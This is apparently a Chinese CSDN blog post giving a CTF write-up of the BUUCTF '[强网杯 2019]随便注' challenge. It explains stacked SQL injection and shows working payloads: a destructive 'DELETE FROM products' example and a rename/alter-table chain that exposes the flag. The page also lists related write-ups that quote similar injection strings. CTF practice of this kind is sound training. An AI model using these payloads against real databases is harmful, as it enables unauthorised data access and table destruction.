buu_web-[强网杯 2019]随便注 1

最新推荐文章于 2022-05-06 14:05:34 发布
最新推荐文章于 2022-05-06 14:05:34 发布
阅读量181 收藏
点赞数
分类专栏: ctf-web刷题之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/108344470
版权

考点:堆叠注入原理

  • 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入
  • 而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?
  • 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1. DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。

在这里插入图片描述
加上单引号之后报错,但是注释掉后恢复正常,说明存在sql注入(题目的名字也疯狂暗示了
order by 查询列数 列数为2
在这里插入图片描述
使用了正则来过滤 在该情况下不能使用联合注入
在这里插入图片描述
尝试堆叠注入,成功!查询数据库名
在这里插入图片描述
1’ ;show columns from 1919810931114514;#
在这里插入图片描述
我们可以知道当前的表是words
在这里插入图片描述
可以将words改名成任意名,然后’1919810931114514’改成words,加入id这列以及修改属性

payload:1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

//sql语句:
1';
alter table words rename to word1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);
#
Diana_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[强网杯 2019]随便1(buu一周目速通)
山至川的博客
10-27 729
这题讲真方法 有三种,惯用的俩(实在太懒不想上图了)总结成了纯纯文档形式还包含个人理解 SQL入是安全的一大分类,海量,难度也大,危害也大。 直接长篇大论了(适用于部分正则被过滤情况): 在SQL的入中存在select,update等字符被过滤的情况 可尝试大小写区分(\i意思是对大小写不敏感) 基本方法(1)是使用堆叠入加SQL预编译 目的是欺骗原来的表与列位置来实现入 /* 预编译相关语法如下: set用于设置变量名和值 prepare用于预备一个语句,并赋予名称,...
BUUCT日记--[强网杯 2019]随便
weixin_41607190的博客
03-30 346
输入 1' union select database()# 会发现被过滤了select、where等关键字 但是“;”没有被过滤,尝试用堆叠入 堆叠入,简单来说就是在表单内用分号隔开,形成一行执行多个语句的效果 输入 1';show tables;# 输入 1';show columns from `1919810931114514`;# 发现flag字段,但是怎么绕过select...
BUUCTF [强网杯 2019]随便
qq_42158602的博客
01-09 1084
打开题目看见一个输入框 输入’报错 应该是有sql入了 使用 1’ # 正确显示 直接上 order by 1' order by 3 # 测试1,2正常,3报错 此时天真的我以为我已经离成功不远了~~ 启动联合查询 -1' union select 1,2 # 提交 继续 ...
BUUCTF_[强网杯 2019]随便
qq_45628145的博客
04-25 579
BUUCTF_[强网杯 2019]随便 进入题目环境 进去之后输入框就有一个1,提交。 这里可以看到查询出了1和hahahah。 判断有没有入点 输入1’,报错了。 输入1’ and 1=1 #,查询结果和1一样。 输入1’ and 1=2 #,无回显,因此,判断这里存在入点。 输入1’ or 1=1#,得到了这个表里面的所有内容。 开始入 可以看到上面查询结果有1和hahah...
BUUCTF [强网杯 2019] 随便
Senimo
03-23 1626
BUUCTF [强网杯 2019] 随便 打开环境: 先输入1查询回显内容: 输入1'测试SQL语句闭合类型: 判断出原SQL闭合方式为:inject='1',查询字段数: 1' union select 11,22 # 产生回显: 屏蔽掉了部分关键字,尝试各种入姿势,直到使用堆叠入: 1';show databases;# 得到了各数据库的名字,再查看表名: 1';show ...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
【学习笔记 23】 buu [强网杯 2019]随便
weixin_43553654的博客
07-26 276
0x00 知识点 1.堆叠入 2.利用rename,alter的sql命令完成数据库操作 0x01 详解 1.什么是堆叠入? 堆叠入就是利用sql命令中利用“;”来做一句sql命令的结束标志,但是在“;”后的同一行里添加其他sql命令仍可以执行。 2.堆叠入与union injection(联合入)之间的区别? 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠入可以执行的是任意的语句。 3.堆叠入的局限性? 堆叠入并不是在每种情况下都能使用的。
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3975
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
SQL Injection8(堆叠入)——强网杯2019随便
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 564
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
【Writeup】BUUCTF_Web_随便
BAKUMANSEC - Just Do It
08-14 4456
【Writeup】BUUCTF_Web_随便 0x01 解题思路 打开页面,显然考点是SQL入: 手工测试一下: ​ ​ ?inject=' ​ ​ ?inject=' or 1# ​ ​ ?inject=' or 0# 可以进行基于布尔的盲释里有这么一句话: 先用sqlmap常规扫描试试: sqlmap identified the following in...
[原题复现]2019强网杯WEB-随便
笑花大王
02-06 651
HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/qwb_2019_supersqli 考察知识点:SQL入漏洞-堆叠入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 做题过程 打开页面测试入点 //判断入点 存在入! ' and 1...
buu ctf web进阶]ssti
08-23
common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值